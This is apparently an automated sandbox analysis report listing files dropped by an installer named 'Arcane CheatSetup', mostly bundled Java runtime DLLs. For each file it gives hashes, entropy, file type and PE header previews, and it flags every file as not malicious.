                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-6TBSI.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):127552
                                Entropy (8bit):6.413283221897154
                                Encrypted:false
                                SSDEEP:3072:SdQ4jWJt4XChlFavveKSQ4gHK/e2Hrgc6kZAn1y1koKMKy1Zf22QYHJiuzTl8ShM:Sy4SJ1TFavvehc7ZnwEr
                                MD5:C3DED5F41E28FAF89338FB46382E4C3E
                                SHA1:6F77920776D39550355B146D672C199A3941F908
                                SHA-256:4691603DFABE6D7B7BEAC887DADC0E96243C2FF4F9A88CE3793E93356C53AA08
                                SHA-512:23621F2856899F40CFA9858DC277372BFE39F0205377543EB23E94422D479A53FDF664F4A9A4515C2285811F01D91AB64A834A03A4D3AB0CB7D78F8AF11135FF
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........[d.@:.N@:.N@:.N[..NB:.N[..NB:.N[..NK:.NIB.NE:.N@:.N{:.N[..NG:.N[..NA:.N[..NA:.N[..NA:.NRich@:.N........PE..L...sPjW...........!...............................m......................................@.........................@...........P.......p...............@...........................................H...@............................................text...n........................... ..`.rdata..............................@..@.data...............................@....rsrc...p...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-78EDT.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):21568
                                Entropy (8bit):6.601333059222365
                                Encrypted:false
                                SSDEEP:384:QwiAYZIxsQbbRLEs5Ltd7rpPVJfq0nYPLr7Ko+:BiPZj+bVEmtd7rpdJfnC7J+
                                MD5:73603BF0DC85CAA2F4C4A38B9806EC82
                                SHA1:74EBC4F158936842840973F54AF50CDF46BC9096
                                SHA-256:39EF85AB21F653993C8AAAB2A487E8909D6401A21F27CBA09283B46556FB16AF
                                SHA-512:5C238D677D458D5B7D43FA3FF424E13B62ABFCEDE66D55E3112DC09BF2F7B640EB8F82D00E41A2C7A7E7B36E3FCE3C2DCB060037314418D329466CC462D0BF71
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..<...<...<...'<8.>...'<:.>...'<..>...<...v...5.7.9...'<..1...'<?.=...'<>.=...'<9.=...Rich<...........................PE..L...nPjW...........!.................&.......0....}m................................F.....@..........................A..U....<..P....`...............<..@....p......@1..............................x;..@............0..(............................text............................... ..`.rdata.......0....... ..............@..@.data........P.......2..............@....rsrc........`.......4..............@..@.reloc.......p.......8..............@..B................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-7HO40.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):116288
                                Entropy (8bit):5.7845827860105885
                                Encrypted:false
                                SSDEEP:3072:UbqmeUF67oaebwU3ta+uHMg9glgFvcfgfgzgG4g9XTXDXp+RuXGXlXdY9vXTXvXQ:8qmeUF67ZeUUVjcIA
                                MD5:5AADADF700C7771F208DDA7CE60DE120
                                SHA1:E9CF7E7D1790DC63A58106C416944FD6717363A5
                                SHA-256:89DAC9792C884B70055566564AA12A8626C3AA127A89303730E66ABA3C045F79
                                SHA-512:624431A908C2A835F980391A869623EE1FA1F5A1A41F3EE08040E6395B8C11734F76FE401C4B9415F2055E46F60A7F9F2AC0A674604E5743AB8301DBADF279F2
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........tm....X...X...X.G.X...X.G.X...X.G.X...X.G.X...XR..X...X...X...X.l.X...X.l.X...X.G.X...X.l.X...XRich...X........PE..L...pPjW...........!................=..............o................................|.....@.........................0...K...|...d.......................@....... ......................................@...............4............................text.............................. ..`.rdata..X...........................@..@.data...............................@....rsrc...............................@..@.reloc.. ...........................@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-7KMRP.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):126016
                                Entropy (8bit):6.608910794554507
                                Encrypted:false
                                SSDEEP:3072:oOxjjADzd+aeaPB9JhjxkM2wzGdXJbD/jn8Y6:ocKzeaPB9JhjxknwzG5JbDb8F
                                MD5:01706B7997730EAA9E2C3989A1847CA6
                                SHA1:7CEAD73CBE94E824FA5E44429B27069384BFDB41
                                SHA-256:20533C66C63DA6C2D4B66B315FFCF5C93AE5416E3DAE68CDD2047EFE7958AB3A
                                SHA-512:3272C8DE6C32D53372D481441DA81AE2B6EA02E8360B23D7F793B24827BD683A6604F43BE18CE2BEE40038FBE7D5F7AF78B2C465A51F82478D881DBEB5744DC2
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........y.r.*.r.*.r.*O..*.r.*.r.*.r.*. .*.r.*. .*.r.*. 0*.r.*. 1*.r.*..0*.r.*...*.r.*. .*.r.*...*.r.*Rich.r.*........PE..L...vPjW...........!.........:.....................m................................c.....@.....................................<.......................@.......\...................................0...@............................................text... ........................... ..`.rdata..8(.......*..................@..@.data...............................@....rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-7LLC2.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):52800
                                Entropy (8bit):6.433054716020523
                                Encrypted:false
                                SSDEEP:1536:Rk2X5KQaT9nNrmTTY99ccAlGGzGRulFJWpiDO:RkgUhpmA99ccOGGzGRuPJWpgO
                                MD5:6D05EAD2F6B95C4AFFCFB1B27DC0C188
                                SHA1:0D04A67505D006493F252985AC294B534D271EF2
                                SHA-256:6330591A151E565B5EAB2D174DF8E2F6523A8F403E4E8D8C8DC58D0945881F19
                                SHA-512:DBE98FA16162636039853E9A82CADBE4E6D5A4E6E282A3FBBC122229C314C91E7C445FEB83921EBFE024DC09BC6AA76682F903036A2D2BEA363F1D09DD571B10
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q..D5.w.5.w.5.w..J..7.w.5.v...w.8..6.w.8..6.w.8..9.w.8..7.w.H..2.w.H..4.w.8..4.w.H..4.w.Rich5.w.........................PE..L...pPjW...........!...............................o................................/&....@....................................<.......................@...............................................@............................................text.............................. ..`.rdata..X...........................@..@.data...D...........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-8BCTR.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):195136
                                Entropy (8bit):6.80727029211823
                                Encrypted:false
                                SSDEEP:3072:fmtIwyq6lFq857zCYLFYEVothL10xYOXjV5qECVTHLy71vJ2qIcWYEfQQxIYh5t+:mIwyqM7qYLVVIqhfqfTm1W+Tws
                                MD5:E1904A4B2D6F657B9FEF053893FE3C41
                                SHA1:59AC965A1029AE936DDD5AE623A9A025D49737EC
                                SHA-256:5929E3510F67FEAE073B8995BFC542FD7A0626F57D2FBC829EFC95206DF8F85F
                                SHA-512:C0A60928299EA2E6DC8AD1E3DE9CEF77C8E520585F8D73BD7F56E33705D1A2AEC04AE9C01A8069AE5A0D71F28AEF42F4A260CF4D5BB44A95DCEB70E5C8DB8FEA
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`.zS$...$...$...-..&...?>..'...?>..!...$.......?>.. ...?>......?>..%...?>..%...?>..%...Rich$...................PE..L...pPjW...........!.....f...........p.............p......................... .......]....@.............................f...\...P.......................@...............................................@............................................text....e.......f.................. ..`.rdata..v[.......\...j..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-8GHN8.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):453184
                                Entropy (8bit):6.516599034237354
                                Encrypted:false
                                SSDEEP:6144:3J/sbugq7rm5zX2JDYfiA9+wvpsEWcIGnFm8iTFOBITfnvxIW1x8:3JUbzq+5zX25qvdfnFm88nvq+x8
                                MD5:5EDAEFFC60B5F1147068E4A296F6D7FB
                                SHA1:7D36698C62386449A5FA2607886F4ADF7FB3DEEF
                                SHA-256:87847204933551F69F1CBA7A73B63A252D12EF106C22ED9C561EF188DFFCBAE8
                                SHA-512:A691EF121D3AC17569E27BB6DE4688D3506895B1A1A8740E1F16E80EEFCE70BA18B9C1EFD6FD6794FAFC59BA2CAF137B4007FCDC65DDB8BCBFCF42C97B13535B
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........T...:...:...:.......:.e....:......:......:.....:....:....:...;.`.:......:.......:.......:.......:.Rich..:.................PE..L...oPjW...........!.........:......n.............Xm................................-.....@.........................@...\6..............................@.......|8..................................Xh..@...............X...8........................text............................... ..`.rdata...;.......<..................@..@.data...............................@....rsrc...............................@..@.reloc..ZE.......F..................@..B................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-90393.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):65600
                                Entropy (8bit):6.461111208462538
                                Encrypted:false
                                SSDEEP:1536:lVeogiQWo3IzLIoDY9p6K/sdDAZ5e1x3afX:veDib4oDu4K/sdDAZ5CxEX
                                MD5:806580640A68234A711D3BB0642130A7
                                SHA1:1EDF20DAAC15FE90E9891E95130D0DD70D005B62
                                SHA-256:CCCC2A9F54E4F5961DD45DAA1F6C97ECFB156EA8E0DF82277A2C109EA4D2E036
                                SHA-512:0AAC087449DEECBB1CFAEE5C3144500CDC4C1D209D1F1F7D8EB41DD7870504BF71D0CC9AE7761BFC609F42273B7FB3CA7801AA54FB0E92BC71C41CC5CAECD31C
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D.H%..H%..H%..A]).J%...k".I%..S.$.L%..S...D%..S.&.O%..H%..w%..S...A%..S.!.I%..S. .I%..S.'.I%..RichH%..........PE..L...pPjW...........!.........L.....................p......................... .......<....@.........................`...........d.......................@...........................................P...@............................................text............................... ..`.rdata..q-..........................@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-94OVM.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):51264
                                Entropy (8bit):6.576803205025954
                                Encrypted:false
                                SSDEEP:1536:urOHh9t7/GAzqHcGxAARrZT9ixHDyo/r0rV9LrBH1bjPEwhEdheBwHWQFgE/XudL:G+9t7/qHcGHuy/pb
                                MD5:3A744B78C57CFADC772C6DE406B6B31E
                                SHA1:A89BF280453C0BCF8C987B351C168AEB3D7F7141
                                SHA-256:629393079539B1B9849704CE4757714D1CBE5C80E82C6BB3BC4445F4854EFA7B
                                SHA-512:506A147F33C09FA7338E0560F850E42139D0875EF48C297DDB3CC3A29F12822011915FACCB21DA908CF51A462F0EBA56B6B37C71D9C0F842BDE4A697FB4FFB64
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O^;w.?U$.?U$.?U$.G.$.?U$...$.?U$.?T$&?U$...$.?U$...$.?U$...$.?U$...$.?U$...$.?U$...$.?U$Rich.?U$........................PE..L...oPjW...........!.....v...8......l..............m................................O1....@.............................u...|...<.......................@.......................................... ...@............................................text...~t.......v.................. ..`.rdata...'.......(...z..............@..@.data...............................@....rsrc...............................@..@.reloc..V...........................@..B................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-9OG1R.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):14912
                                Entropy (8bit):6.381906222478272
                                Encrypted:false
                                SSDEEP:192:kNncquU+hyD13XLPVlD6o+N9F5os7USnYe+PjPriT0fwXF27:kNcWp7PVl67/nYPLr7s27
                                MD5:3C9DC0ED8ADD14A0E5B845C1ACC2FF2E
                                SHA1:25C395ADE02199BEDCEE95C65E088B758CD84435
                                SHA-256:367C552FBA3DA5F22791CF8F22B983871639ECD2EF7F5B1880021FE4C4F65EE4
                                SHA-512:4DD5F68180D03B6621E46732F04B47F996B96F91F67845538D1B303E598CCFDB5E4F785A76DE7DFCB8918125FDB06B9068C4EAB06984B5AA9224DCE90190BA1A
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z>Mg._#4._#4._#4.'.4._#4..4._#4..4._#4..4._#4._"4>_#4..4._#4..4._#4..4._#4..4._#4Rich._#4................PE..L...pPjW...........!......................... .....o.........................`.......>....@..........................%......\"..d....@..............."..@....P..D.... ...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...`....0......................@....rsrc........@......................@..@.reloc.......P....... ..............@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-9PR86.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):109120
                                Entropy (8bit):5.986571003903383
                                Encrypted:false
                                SSDEEP:1536:LE9WcstxlDgZ9EYDKg0nc6N3MR+EpOB+o+5PVT/B:ghspgZPDanhs+EpOBF+5PFB
                                MD5:A5455B9BEB5672D89B1F0FCFAA4C79CA
                                SHA1:9C7DBB5AD1CB3EBE7347A9CDDD80389902DA81EC
                                SHA-256:89A429889DCD0F6A3FE56217A0FEB5912132AAB2817643021EAE3716DA533D4A
                                SHA-512:131866A4754F4AF78A94F0776815E7EA4375736A4B11A723B87A4436FA101D271FFE14E4B49D3AB1AE2FA61CDBDED0C3D174C75327BE3C24E0E4CC39AFFA9469
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ot....Z...Z...Z..Z...ZC@.Z...Z..Z...Z..Z...Z.v.Z...Z.v.Z...Z...Z...Z.x.Z...Z..Z...Z..Z...Z..Z...Z..Z...ZRich...Z........................PE..L...oPjW...........!..............................~m......................................@.........................P...J............0...t..............@...........P...............................0...@............... ...d...`....................text............................... ..`.rdata...D.......F..................@..@.data...0...........................@....rsrc....t...0...v..................@..@.reloc...............|..............@..B........................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-AASG5.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):191552
                                Entropy (8bit):6.744419946343284
                                Encrypted:false
                                SSDEEP:3072:lScg0xvhTZNIs3Ft+STckCBQo3C0Y22vncTBfsO9jZqMN3cH1Tefqk:lSclI6nTc3BQo3C0YHncTBxvs65
                                MD5:48C96771106DBDD5D42BBA3772E4B414
                                SHA1:E84749B99EB491E40A62ED2E92E4D7A790D09273
                                SHA-256:A96D26428942065411B1B32811AFD4C5557C21F1D9430F3696AA2BA4C4AC5F22
                                SHA-512:9F891C787EB8CEED30A4E16D8E54208FA9B19F72EEEC55B9F12D30DC8B63E5A798A16B1CCC8CEA3E986191822C4D37AEDB556E534D2EB24E4A02259555D56A2C
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........v...%...%...%..w%...%.7D%...%.7q%...%..|%...%...%...%.7E%*..%.7u%...%.7r%...%Rich...%........................PE..L....DjW.....................(...................@..........................0............@.................................\*..d.......................@............................................$..@............................................text............................... ..`.rdata...t.......v..................@..@.data....4...@......."..............@....rsrc................8..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-B9B0I.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):69696
                                Entropy (8bit):6.89860109289213
                                Encrypted:false
                                SSDEEP:1536:ZCghp1EJqcGdjandlraksIOwIOpVnToIft4tpgO6:/142jUhimp9TBft4tqO6
                                MD5:CB99B83BBC19CD0E1C2EC6031D0A80BC
                                SHA1:927E1E24FD19F9CA8B5191EF3CC746B74AB68BCD
                                SHA-256:68148243E3A03A3A1AAF4637F054993CB174C04F6BD77894FE84D74AF5833BEC
                                SHA-512:29C4978FA56F15025355CE26A52BDF8197B8D8073A441425DF3DFC93C7D80D36755CC05B6485DD2E1F168DF2941315F883960B81368E742C4EA8E69DD82FA2BA
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........H....................2.................4.....................5.............................Rich............PE..L...pPjW...........!.........h.....................p.........................0......V.....@.................................L...d.......................@.... ..X...0...................................@............................................text............................... ..`.rdata..wV.......X..................@..@.data...............................@....rsrc...............................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-B9PAS.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):79936
                                Entropy (8bit):6.675027571633986
                                Encrypted:false
                                SSDEEP:1536:ygRdVzzmTj2iu+wk5eQjBE55W+hYRwZZ3GFjJJ5n5WF:yIfmHsM5j6VqJJ55WF
                                MD5:691B937A898271EE2CFFAB20518B310B
                                SHA1:ABEDFCD32C3022326BC593AB392DEA433FCF667C
                                SHA-256:2F5F1199D277850A009458EDB5202688C26DD993F68FE86CA1B946DC74A36D61
                                SHA-512:1C09F4E35A75B336170F64B5C7254A51461DC1997B5862B62208063C6CF84A7CB2D66A67E947CBBF27E1CF34CCD68BA4E91C71C236104070EF3BEB85570213EC
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!.._e.}.e.}.e.}.~'..d.}.~'..g.}.....f.}.~'..c.}.e.|..}.l...b.}.l...d.}.~'..D.}.~'..d.}.~'..d.}.~'..d.}.Riche.}.................PE..L...pPjW...........!.........l.....................o.........................`......-.....@.............................1............0............... ..@....@...................................... ...@...................l...`....................text............................... ..`.rdata...L.......N..................@..@.data........ ......................@....rsrc........0......................@..@.reloc..*....@......................@..B........................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-C92NJ.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):30784
                                Entropy (8bit):6.609051738644882
                                Encrypted:false
                                SSDEEP:384:mk87qhVj8sqgP7CRLMOPfkGo7UdJs0flkg2uG8RPGHTR5ny5pnYPLr7z:mk87qhVjaMOPJdJFflLJR+V03C7z
                                MD5:7BD914407C6D236B27865A8C63147B7F
                                SHA1:9B49E48705341D30E3F92B85652E924C7985E415
                                SHA-256:549849DC910261D817670B192715430395993E811D0FD3103651237D7F18929D
                                SHA-512:624DC95F696BEA311726EAFB0017F363C8703B95A2E08DE984C642867888CF5B9172326C2E2567ED4A2EA28F806B633840552C80BE49EB6CF2A8FC4A0C259117
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.Nu.h &.h &.h &...&.h &...&.h &...&.h &.h!&_h &...&.h &...&.h &...&.h &...&.h &...&.h &Rich.h &........PE..L....PjW...........!.....8...(.......A.......P.....o.................................G....@.........................P^.......V..P....................`..@...........`Q...............................U..@............P..D............................text...66.......8.................. ..`.rdata.. ....P.......<..............@..@.data...$....p.......V..............@....rsrc................X..............@..@.reloc...............\..............@..B................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-CKDJ7.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):269888
                                Entropy (8bit):6.418120581797452
                                Encrypted:false
                                SSDEEP:6144:Fp9B0qT85g5Sq+VBY2qVLC2wH5rM8HoQvlHO:5uqT85sSq+ERVm2wZEQvlHO
                                MD5:F8211DB97BF852C3292C3E9C710C19D9
                                SHA1:46DAD07779E030D8D1214AFE11C4526D9F084051
                                SHA-256:ECF4307739CA93F1569CE49377A28B31FE1EB0F44B6950DBAAFA1925B24C9752
                                SHA-512:B3E20EECA87136CAE77F06E4149E65EBFEF71A43589F7E2833008FE43811A2BC8B6202B6ADB5CE122A1822E83CE226B833DEF93A2B161476BD5B623794E4F697
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a..L%...%...%...>c..8...J.4.-...,.......%.......>c5.....>c4.....>c..$...>c..$...Rich%...................PE..L...rGjW.................t...........C............@..................................a....@.................................L...x.......................@.......8................................... ...@...............h...T........................text....r.......t.................. ..`.rdata...c.......d...x..............@..@.data...8........z..................@....rsrc................V..............@..@.reloc..>-..........................@..B................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-CSEKM.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):25664
                                Entropy (8bit):6.488681310308951
                                Encrypted:false
                                SSDEEP:384:GxZ2v7Oc56lspQEgde9M3z27lFOJIjkzIPV5yKlWFKbKwnYPLr7Wo5L:Xr5PQEOe9MD4lFhjk8ddeKWwC7dL
                                MD5:039AD8A7A4B14C321F156878838A2340
                                SHA1:6AD9D2FBA988193D16E7B3278C0D0757AB99B3EF
                                SHA-256:ED3AD7EBA989FB31C2ABC3220694D1446D33659782CB1B333318EC54A577389D
                                SHA-512:7D5B8C191A7D0C4FEDB831DE197A3CB5DC0564AD3F2E57EEE8C506B2308B656D2F0FE086D508FAB8F03CA0E1B0574E708728373DFA3116C9B9FC5DFDB72FEE46
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O.............................;......V...............:..........................Rich....................PE..L...rPjW...........!.....(..."......h2.......@.....p.................................3....@.........................`O.......G..d....p...............L..@...........PA..............................8D..@............@..4............................text....&.......(.................. ..`.rdata..8....@.......,..............@..@.data...`....`.......B..............@....rsrc........p.......D..............@..@.reloc..^............H..............@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-D49GQ.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):21568
                                Entropy (8bit):6.4868701533420925
                                Encrypted:false
                                SSDEEP:384:uVI9/tEAHVvfiqiW9LEiGTHb6hVXbS7fLsD5bGGNET7T7T7T7JyFoynPV5hgGLVt:uVI9/yA9f1iW9LEiGTHb6hVXbS7QbGG9
                                MD5:7C2959F705B5493A9701FFD9119C5EFD
                                SHA1:5A52D57D1B96449C2B40A82F48DE2419ACA944C3
                                SHA-256:596F89E7E5D9AC2B1F97FA36A20A7405C1CC41A9FCBA96DB089ADA4550131B24
                                SHA-512:B7B48BD14701F75B9018BEDEE5A4CFCEBDAC342F83339FB3F1EFB7855598474C9D1CC993B5D4ADD3326140435087D2BD7CBBC18BC76C64EAD6234A9A7D57C552
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..3..`..`..`.E.`..`.E.`..`.E `..`...`..`..`2.`.E!`..`.E.`..`.E.`..`.E.`..`Rich..`........................PE..L...pPjW...........!.........".......#.......0.....p.................................h....@.........................@B.......<..x....`...............<..@....p.......0...............................;..@............0...............................text............................... ..`.rdata..6....0......................@..@.data........P.......2..............@....rsrc........`.......4..............@..@.reloc..&....p.......8..............@..B................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-DCG3E.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15936
                                Entropy (8bit):6.477340414037824
                                Encrypted:false
                                SSDEEP:384:Gps45cnk6LlmSHhV8i+ceek4SzS+nYPLr7wd:Gpsnn5AS/8jZek7C7wd
                                MD5:4DE6BFE6EA98BC42A5358ED8307107B2
                                SHA1:8F687E60784FD9046A361DC1DC85D43051CBD577
                                SHA-256:7C07D167AA4A23AB64A205301663C87E578FF6B31985DF8B51AF80CA6999176F
                                SHA-512:8091AADEACAD1DAC5191EBB996D1E4BE25A19C10A4E76F79AB7EA2A592711FD39AAD7E89D7DEE09385296AA7A649AABFA7C325C4A627AFE1C009C906709EDB5A
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L....DjW............................|........ ....@..........................`............@.................................4#..P....@..H............&..@....P....... ...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...H....@......................@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-DK2B0.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):200768
                                Entropy (8bit):6.431501859060678
                                Encrypted:false
                                SSDEEP:3072:lC0MaRHVsSduCCkNlKpR1FHNnuNcCwJPT54l2B3Fzkmldrz5ZD9hYJOj9T3iRK:s0XR1sYtxgGl2B3uWjhYJOj9TSY
                                MD5:434CBB561D7F326BBEFFA2271ECC1446
                                SHA1:3D9639F6DA2BC8AC5A536C150474B659D0177207
                                SHA-256:1EDD9022C10C27BBBA2AD843310458EDAEAD37A9767C6FC8FDDAAF1ADFCBC143
                                SHA-512:9E37B985ECF0B2FEF262F183C1CD26D437C8C7BE97AA4EC4CD8C75C044336CC69A56A4614EA6D33DC252FE0DA8E1BBADC193FF61B87BE5DCE6610525F321B6DC
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............g_..g_..g_..._..g_..._..g_..._..g_..._..g_aT._..g_aT._..g_aT._..g_..f_..g_..._..g_.._..g_.._..g_..._..g_.._..g_Rich..g_........................PE..L...oPjW...........!...............................m.........................0............@..........................l..................X&..............@........(......................................@...............<....^.......................text...\........................... ..`.rdata..............................@..@.data...\"..........................@....rsrc...X&.......(..................@..@.reloc...(.......*..................@..B................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-DLMB6.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15936
                                Entropy (8bit):6.475930674615241
                                Encrypted:false
                                SSDEEP:384:GpsFG5BnK6xmSHhV8TCeeX4SzREnYPLr7Ggp:Gpsen0S/8TveXUC7jp
                                MD5:31C0CED43A07A2DFF3AFC557EBABBE0F
                                SHA1:9100A7393B919EB35C79CE16A559D783219E2F20
                                SHA-256:B93D0D62436D89C84C66ABBDCF817084A6BA01F7E10053C8F343DF5D53D37536
                                SHA-512:716818BBF6E4F21C2A627259F1D35E8375EFEF9C3B197B3AF6E10A4A1735CC643141C32270DF7F6FE25733517BE38CAA09205B98119996237E8EAE6A7D0825A7
                                Malicious:false
